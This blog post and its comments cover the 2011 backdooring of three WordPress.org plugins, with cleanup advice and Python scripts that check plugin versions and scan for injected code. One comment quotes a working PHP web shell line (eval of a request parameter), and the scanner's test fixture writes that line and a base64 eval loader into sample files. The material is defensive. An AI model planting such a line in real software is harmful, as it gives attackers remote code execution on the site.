Notice that you can’t get access to the forums or trac? Can’t commit a plugin or theme? Yesterday Matt announced that WordPress had force reset all WordPress.org passwords due to a security breach. Three popular plugins – WPTouch, AddThis and W3 Total Cache – were found to contain backdoor trojans. These were not added by the plugin developers themselves: the developers’ own WordPress.org accounts were compromised and new, backdoored versions of the plugins were uploaded from those accounts.
Let’s Look at The Scale of the Problem
A quick look at the stats in the WordPress repository gives an indication of quite how big the potential problem is:
Aaron at AddThis has said on his blog that the offending plugin is 2.1.3 if it was downloaded on 20th or 21st June. It was downloaded 3,583 times yesterday. Here’s how many people are currently using 2.1.3:

The affected versions of WPTouch are 1.9.27 and 1.9.28 – again only if you updated in the past few days. It was downloaded 14,670 times yesterday. Here’s how many people are using those versions:

I can’t find which version of W3 Total Cache is affected, but from the uploads on its trac page it looks like 0.9.2.2 (please correct me if that’s wrong!). Again, check your dates. It was downloaded 3,442 times yesterday.

Again, I really want to stress that the real issue is with plugins updated or downloaded on 20th or 21st June. Personally I struggle to remember what I’ve done over the past few days so to be safe I would update these plugins – it’s always good to be up-to-date anyway.
What Should I Do?
- Don’t panic or fire off angry emails
- Upgrade these plugins immediately – they all have new versions that no longer contain the backdoor
- Change all of your passwords
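Checking whether you have one of the listed versions installed, and whether the plugin’s main file changed during the 20th/21st June window, is quick to script. The example below is added here and is not from this post or from WordPress; it reads the standard `Plugin Name:` / `Version:` header block that WordPress itself parses, uses the plugin directory names `wptouch`, `addthis` and `w3-total-cache` as an assumption about the slugs, assumes the year is 2011, and builds a throwaway plugins directory with constructed sample files so it runs offline.

```python
import os
import re
import tempfile
from datetime import datetime, timezone

# Affected releases as listed in the post; the W3 Total Cache version is the
# author's tentative reading of the trac uploads, and the slugs are assumed.
AFFECTED = {
    "wptouch": {"1.9.27", "1.9.28"},
    "addthis": {"2.1.3"},
    "w3-total-cache": {"0.9.2.2"},
}

# The post names 20th/21st June; the year 2011 is an assumption made here.
WINDOW_START = datetime(2011, 6, 20, tzinfo=timezone.utc)
WINDOW_END = datetime(2011, 6, 22, tzinfo=timezone.utc)

# Header lines look like "Plugin Name: Foo" or " * Version: 1.2.3".
HEADER_RE = re.compile(r"^\s*\*?\s*(Plugin Name|Version):\s*(.+?)\s*$", re.M)


def parse_plugin_header(path):
    """Read the WordPress header block (Plugin Name:, Version:) from a plugin file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        head = fh.read(8192)  # WordPress only inspects the first 8 KB as well
    return {key: value for key, value in HEADER_RE.findall(head)}


def find_main_file(plugin_dir):
    """The main file is whichever top-level .php file carries a 'Plugin Name:' header."""
    for name in sorted(os.listdir(plugin_dir)):
        path = os.path.join(plugin_dir, name)
        if name.endswith(".php") and os.path.isfile(path):
            if "Plugin Name" in parse_plugin_header(path):
                return path
    return None


def check_plugins(plugins_dir):
    """Return [(slug, version, reasons)] for installed plugins that need attention."""
    findings = []
    for slug in sorted(os.listdir(plugins_dir)):
        pdir = os.path.join(plugins_dir, slug)
        if not os.path.isdir(pdir) or slug not in AFFECTED:
            continue
        main = find_main_file(pdir)
        if main is None:
            continue
        version = parse_plugin_header(main).get("Version", "?")
        reasons = []
        if version in AFFECTED[slug]:
            reasons.append("version listed as backdoored")
        mtime = datetime.fromtimestamp(os.path.getmtime(main), tz=timezone.utc)
        if WINDOW_START <= mtime < WINDOW_END:
            reasons.append("main file modified in the 20-21 June window")
        if reasons:
            findings.append((slug, version, reasons))
    return findings


def build_demo_plugins_dir():
    """Constructed fixture: a fake wp-content/plugins with sample header files."""
    root = tempfile.mkdtemp(prefix="wp-plugins-")
    samples = {
        ("wptouch", "wptouch.php"): "1.9.28",                 # listed as affected
        ("addthis", "addthis_social_widget.php"): "2.1.2",    # older, not listed
        ("w3-total-cache", "w3-total-cache.php"): "0.9.2.2",  # listed (tentatively)
    }
    for (slug, fname), ver in samples.items():
        os.makedirs(os.path.join(root, slug))
        with open(os.path.join(root, slug, fname), "w") as fh:
            fh.write(f"<?php\n/*\nPlugin Name: {slug}\nVersion: {ver}\n*/\n")
    # Backdate the AddThis file into the window so the date check fires too.
    stamp = datetime(2011, 6, 21, 12, tzinfo=timezone.utc).timestamp()
    addthis = os.path.join(root, "addthis", "addthis_social_widget.php")
    os.utime(addthis, (stamp, stamp))
    return root


if __name__ == "__main__":
    for slug, ver, why in check_plugins(build_demo_plugins_dir()):
        print(f"{slug} {ver}: {'; '.join(why)}")
```

Point `check_plugins()` at your real `wp-content/plugins` directory to use it for real. The date check is deliberately independent of the version check: an unlisted version whose file changed in the window is still worth a look, because the modification time is what tells you the plugin was fetched while the bad uploads were live.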
To keep up to date you can keep an eye on the WordPress News blog, which tends to carry all of the latest, most important WordPress happenings.
I can confirm, having 2 of these plugins installed, that I had a trojan set itself up cozy in my server last week, and I spent about a day cleansing it.
The affected files, in my case, were all index.php files, with the classic “eval(base64_decode(” code, which inserted “<iframe” codes at the start of all web pages.
From your web root, you can run this command to see if it has crept into any files:
find . -exec grep "eval(base64_decode" '{}' \; -print

but the real source was probably another file with code like this:

<?php if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));

Well, the biggest worrying questions in my opinion are:
1. How did that happen in the first place?
2. How did the hackers manage to insert that code in 3 different plugins almost all at once?
3. How to prevent that from happening again to other plugins?
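The find/grep one-liner in the comment above only catches the base64 loader; the request-driven eval it mentions as the likely real source needs a second pattern. The scanner below is an added example, not code from the post or from either commenter: it walks a web root, reports file, line number and which rule matched, and goes slightly beyond the comment by also covering `$_GET`, `$_POST` and `$_COOKIE` as the eval input. The file extensions scanned and the sample files it creates in a temporary directory are constructed for the demonstration.

```python
import os
import re
import tempfile

# Two shapes described in the comment above, plus the generic "eval on request
# input" form. Rule names are constructed here, not a published rule set.
SIGNATURES = [
    ("eval-base64", re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)),
    ("eval-request-input",
     re.compile(r"eval\s*\([^;]*\$_(?:REQUEST|GET|POST|COOKIE)\b", re.I)),
]

# Assumed set of file types worth scanning under a WordPress web root.
SCAN_EXTS = (".php", ".inc", ".html", ".htm", ".js")


def scan_file(path):
    """Return [(line_no, rule_name, line_excerpt)] for every signature hit in one file."""
    hits = []
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            for no, line in enumerate(fh, 1):
                for name, rx in SIGNATURES:
                    if rx.search(line):
                        hits.append((no, name, line.strip()[:120]))
    except OSError:
        pass  # unreadable file: skip rather than abort the whole scan
    return hits


def scan_tree(root, exts=SCAN_EXTS):
    """Walk the web root like the find/grep one-liner, but report line and rule."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(exts):
                path = os.path.join(dirpath, fname)
                hits = scan_file(path)
                if hits:
                    report[os.path.relpath(path, root)] = hits
    return report


def build_demo_webroot():
    """Constructed fixture: one clean file and two files carrying the shapes above."""
    root = tempfile.mkdtemp(prefix="webroot-")
    files = {
        # Clean front controller: should not be reported.
        "index.php": "<?php\n/** clean front controller */\nrequire 'wp-blog-header.php';\n",
        # Injected loader; the base64 payload here is just the text 'ABC'.
        "wp-content/index.php":
            "<?php eval(base64_decode('QUJD')); ?>\n<?php /* Silence is golden. */ ?>\n",
        # Request-driven eval, the shape quoted in the comment above.
        "wp-content/uploads/cache.php":
            "<?php if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, hits in sorted(scan_tree(build_demo_webroot()).items()):
        for no, rule, excerpt in hits:
            print(f"{rel}:{no} [{rule}] {excerpt}")
```

Treat a hit as a lead, not a verdict: a few legitimate plugins ship obfuscated code that also calls `eval(base64_decode(`, so compare any flagged file against a fresh copy of the plugin from the repository before deleting it. A clean scan is also not proof the server is clean; it only says these two shapes were not found in the scanned file types.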
Can you clarify what “change all your passwords” means? Like system passwords, admin passwords, the users’ passwords?
Which are vulnerable?
The more immediate question is surely:
How many other plugins have been affected but we don’t know about it yet?
Have they done a repository scan to ensure it is really only these three plugins? Or how can we be sure that it is only these three plugins?
Indeed, this exploit has been documented for WP-phpMyAdmin (and perhaps other installations of phpMyAdmin or phpPgAdmin). It’s a good idea to scan your files, as I showed above, if you suspect anything.
Thanks for sharing, bro…
:D
Nice info…
Your tips are nice..